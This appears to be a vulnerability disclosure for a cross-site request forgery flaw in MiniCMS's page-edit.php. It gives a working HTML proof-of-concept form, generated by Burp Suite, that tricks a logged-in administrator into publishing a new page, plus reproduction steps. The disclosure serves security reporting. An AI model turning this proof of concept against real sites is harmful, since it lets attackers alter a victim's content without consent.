There is another CSRF vulnerabilities in page-edit.php that can lead to add page

[zonesec0]

Vendor of Product

https://github.com/bg5sbk/MiniCMS

Vulnerability Type

CSRF

Vulnerable File

page-edit.php

Affected Product Code Base

<v1.11

POC

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://www.minicms.com/mc-admin/page-edit.php" method="POST">
      <input type="hidden" name="&#95;IS&#95;POST&#95;BACK&#95;" value="" />
      <input type="hidden" name="title" value="hello" />
      <input type="hidden" name="content" value="hello" />
      <input type="hidden" name="path" value="&#47;hello" />
      <input type="hidden" name="year" value="" />
      <input type="hidden" name="month" value="" />
      <input type="hidden" name="day" value="" />
      <input type="hidden" name="hourse" value="" />
      <input type="hidden" name="minute" value="" />
      <input type="hidden" name="second" value="" />
      <input type="hidden" name="can&#95;comment" value="1" />
      <input type="hidden" name="state" value="publish" />
      <input type="hidden" name="file" value="" />
      <input type="hidden" name="save" value="ä&#191;&#157;å&#173;&#152;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Vulnerability reproduction

• After the installation is complete, log in as administrator.
• Save poc as HTML file
  
• Accessing this HTML file in a browser ,click "Submit request"
  
• Successful exploitation of vulnerabilities